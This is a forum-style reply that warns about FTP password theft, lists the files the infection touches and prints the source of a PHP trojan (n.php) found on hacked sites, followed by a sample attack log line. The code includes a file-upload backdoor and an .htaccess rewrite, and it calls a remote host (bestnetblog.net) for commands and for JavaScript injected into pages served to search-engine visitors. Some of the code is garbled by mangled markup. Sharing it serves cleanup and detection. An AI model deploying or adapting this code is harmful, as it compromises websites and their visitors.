A client of mine had the same.
Do a malware scan and do not use CuteFTP or any other popular FTP program. All those passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them
Here is the diassembled files (n.php) that makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.
Files known to be infected:
n.php
/.log/ this folder is sometimes created, delete it.
.htaccess will be overwritten, check it.
check every index.php .html for the img tag.
<?
error_reporting(round(0));
if (isset(_GET[q]))
{
if( !(preg_match("/^([a-z0-9-.)(&=]*)/i", _GET[q])))
{
die;
}
}
if (extension_loaded(curl) &&function_exists(curl_init) &&function_exists(curl_exec))
{
function l__0(_0)
{
_1 =curl_init();
curl_setopt(_1, 10002, _0);
curl_setopt(_1, 42, round(0));
curl_setopt(_1, 19913, round(0+1));
curl_setopt(_1, 52, round(0+0.25+0.25+0.25+0.25));
curl_setopt(_1, 13, round(0+6.66666666667+6.66666666667+6.66666666667));
curl_setopt(_1, 3, round(0+80));
curl_setopt(_1, 10018, Mozilla/4.0 (compatible;
MSIE 6.0;
Windows NT 5.2;
SV1;
.NET CLR 2.0.50727;
InfoPath.1));
_2 =curl_exec(_1);
_3 =curl_getinfo(_1, 2097154);
if (_3 >
= round(0+200+200)) _2 = false;
curl_close(_1);
return _2;
}
}
else if(function_exists( file_get_contents))
{
function l__0(_0)
{
return file_get_contents(_0);
}
}
else die( not work);
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
@mkdir( .log/);
@chmod( .log/,round(0+255.5+255.5));
@mkdir( .log/._4);
@chmod( .log/._4,round(0+127.75+127.75+127.75+127.75));
_5 = .log/._4. /xmlrpc.txt;
if (@fopen(_5, r))
{
}
else
{
_6 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_6, bestnetblog.net);
fclose(_6);
}
if ( _GET[ q] == alcobro )
{
_5 = .htaccess;
if (file_exists(_5))
{
_7 = disable;
}
else
{
_8 = " RewriteEngine On RewriteCond %
{
REQUEST_FILENAME
}
!-f RewriteCond %
{
REQUEST_FILENAME
}
!-d RewriteRule ^(.*) "._SERVER[ SCRIPT_NAME]."?q=1 [L] ";
_9 =fopen( .htaccess, w+);
fwrite(_9,_8);
fclose(_9);
_7 = enable;
}
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_11 = http://.curlit. /logdomain.php?q=._SERVER[ HTTP_HOST];
_12 = l__0(_11);
echo _12._7;
die;
}
if (_GET[ dom100500] != )
{
_13 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_13,_GET[ dom100500]);
fclose(_13);
echo 100500ok;
die;
}
if (_GET[ up100500] != )
{
_14 = ;
_14 = _14 .basename( _FILES[ uploaded][ name]) ;
_15=round(0+0.5+0.5);
if(move_uploaded_file(_FILES[ uploaded][ tmp_name], _14))
{
echo up100500;
}
echo '<
form enctype="multipart/form-data" method="POST">
<
input name="uploaded" type="file">
<
input type="submit" value="U">
<
/form>'
;
die;
}
function l__1(_16)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
_17 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_18 =str_replace( -, +,_17);
_18 =str_replace( _, +,_17);
_19 = http://www.google.com/search?hl=en&as_q=._18. &num=100&as_qdr=all;
_20 = l__0(_19);
preg_match_all( #<div class="s">(.*)<br>#U,_20,_21);
_22=array();
for (_23=round(0);
_23<
="" _31;
="" ++_32)="" _33="_28[_30][_32];
" this-="">
_26[_33][] = _28[_30][_32+round(0+0.2+0.2+0.2+0.2+0.2)];
}
}
_34 =array_keys(this->
_26);
foreach (_34 as _17)
{
this->
_26[_17] =array_unique(this->
_26[_17]);
}
}
function l__3(_35)
{
_36 = round(0);
for (_30=round(0);
_36 <
_35;
++_30)
{
_37 =array_rand(this->
_26);
_38 =mt_rand(round(0+1.25+1.25+1.25+1.25), round(0+4+4+4));
for (_32=round(0);
_32_26[_37][mt_rand(round(0),count(this->
_26[_37]) - round(0+0.5+0.5))];
if (_40 == ) _40 =array_rand(this->
_26);
_37 = _40;
if (_37 == ) break round(0+0.5+0.5+0.5+0.5);
}
}
foreach (_39 as _41)
{
_42=count(_41);
if (_42<
=round(0+2)) continue;
if (strlen(_41[_42-round(0+0.5+0.5)]) <
round(0+0.8+0.8+0.8+0.8+0.8)) unset(_41[_42-round(0+0.333333333333+0.333333333333+0.333333333333)]);
_41[_42-round(0+2)] =rtrim(_41[_42-round(0+2)], ,:;
);
_41[_42-round(0+0.25+0.25+0.25+0.25)] =rtrim(_41[_42-round(0+0.25+0.25+0.25+0.25)], ,:;
);
_43 .=ucfirst(implode( , _41)). . ;
}
_43 =str_replace( ., ., _43);
return _43;
}
}
_27 = _25;
_44 = new l__2(_27);
_45 = _44->
l__3(round(0+466.666666667+466.666666667+466.666666667));
_45 =preg_replace( /[^a-zA-Z\\., -]+?/, , _45);
_46 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_46=str_replace( -, ,_46);
_46=str_replace( _, ,_46);
_47 =str_replace ( , +, _46);
if(_GET[ page] != 1)
{
_48 = &start=.(_GET[ page]-round(0+0.5+0.5))*round(0+10.5+10.5);
}
_49 = l__0( http://images.google.com/images?q=._47. &lr=lang_en._48);
preg_match_all( /href="?\\/imgres\\?imgurl=([^\\&]+)/, _49, _50);
_51 = array();
for (_32 = round(0);
_32 _54 ) break;
preg_match_all( #^\\.log/._4."/(.*).html#i", _58, _59 );
_57 .= <a href="._53._59[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _, ,str_replace( -, , _59[round(0+0.5+0.5)][round(0)])). ">.str_replace( _, ,str_replace( -, , _59[round(0+0.333333333333+0.333333333333+0.333333333333)][round(0)])). </a>, ;
_56++;
}
_60 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= .str_replace( , %20, _46));
preg_match_all( |\\["([^"]+)",|si, _60, _61, 1);
_62 = round(0);
array_shift(_61[round(0+0.2+0.2+0.2+0.2+0.2)]);
foreach (_61[round(0+0.333333333333+0.333333333333+0.333333333333)] as _63)
{
_64 .= <a href='._53.str_replace( , -, _63). ' title='._63. '> . _63 . </a>, ;
if (_62++ >
round(0+2.75+2.75+2.75+2.75)) break;
}
_65 = _53._GET[ q];
_66 = <
_72;
_32++ )
{
if ( (preg_match( /\\<
script/imsU, _73[round(0)][_32]) == round(0)) AND (strlen(_73[round(0)][_32]) >
_74) )
{
_74 =strlen(_73[round(0)][_32]);
_75 = _32;
}
}
_71 =str_ireplace( _73[round(0)][_75], _73[round(0)][_75]. <
REPLACEME>
, _71 );
_76 =fopen( _70, w );
fputs(_76, _71);
fclose(_76);
}
_77 = <
h1>
.strtoupper(_46)._78. <
/h1>
._64._57. ._69. <p>._66. </p>;
return _77;
}
function l__4(_79)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
_80= .log/._4. /._79 . .html._GET[ page];
if(@file_exists(_80))return@file_get_contents(_80);
_16=str_replace( -, ,_79);
_16=str_replace( +, ,_79);
_81=l__1(_16);
_82=@fopen(_80, w);
@fwrite(_82,_81);
@fclose(_82);
return _81;
_83=file_get_contents(_80);
}
_84=array( 66.228., 67.195., 68.142., 66.196., 68.180., 72.30., 74.6., 66.94., 66.163., 64.75., 216.32., 66.163., 65.52., 65.53., 65.54., 65.55., 66.249., 66.102., 209.85., 72.14., 74.125., 64.68., 64.233., 216.239., 173.194., 91.184., 94.231., 127.0., 31.43.);
_85=getenv( REMOTE_ADDR);
_86=explode( ., _85);
for (_32=round(0);
;
_32++)
{
if(_84[_32]==NULL) break;
_87=explode( ., _84[_32]);
if(_87[round(0)]==_86[round(0)]&&_87[round(0+0.333333333333+0.333333333333+0.333333333333)]==_86[round(0+0.333333333333+0.333333333333+0.333333333333)])
{
if(_GET[ q]!= )
{
_70 = .log/._4. /shab100500.txt;
if (filesize(_70) <
round(0+200+200+200+200) )
{
_71 = <
head>
<
title>
title<
/title>
<
/head>
<
body>
<
REPLACEME>
<
/body>
<
/html>
;
}
else
{
_71 =file_get_contents( _70 );
}
_88=basename(_GET[ q]);
_46 = _GET[ q];
_46=str_replace( -, ,_46);
_46=str_replace( .html, ,_46);
_71 =preg_replace( /<
title>
(.*)<
\\/title>
/imsU, <
title>
.ucwords(_46). <
/title>
<
meta name="googlebot" content="noarchive">
, _71 );
_71 =str_ireplace( <
REPLACEME>
, l__4(_88), _71 );
print _71;
exit;
}
}
}
if (_GET[ q]!= )
{
if (strpos(_SERVER[ HTTP_USER_AGENT], Opera) !== false)
{
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die;
}
if (strpos( _SERVER[ HTTP_REFERER], site% ) >
round(0) )
{
}
else
{
if (strpos( _SERVER[ HTTP_REFERER], google. ) ||strpos( _SERVER[ HTTP_REFERER], yahoo. ) ||strpos( _SERVER[ HTTP_REFERER], bing. )>
round(0) )
{
_89 = round(0+10+10+10)*round(0+15+15+15+15);
_90= .log/._4. /iog.txt;
if(!file_exists(_90)||time()-filemtime(_90)>
_89)
{
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_91 = http://.curlit. /badcompany.php?q=._4._SERVER[ SCRIPT_NAME];
_2 = l__0(_91);
_92 =fopen( .log/._4. /iog.txt, w+);
fwrite(_92,_2);
fclose(_92);
}
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die();
}
}
}
header( Location: http://._SERVER[ HTTP_HOST]);
?>
Grep:
Attack log example:
91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro
This IP is used to monitor activity, it’s probably also hacked.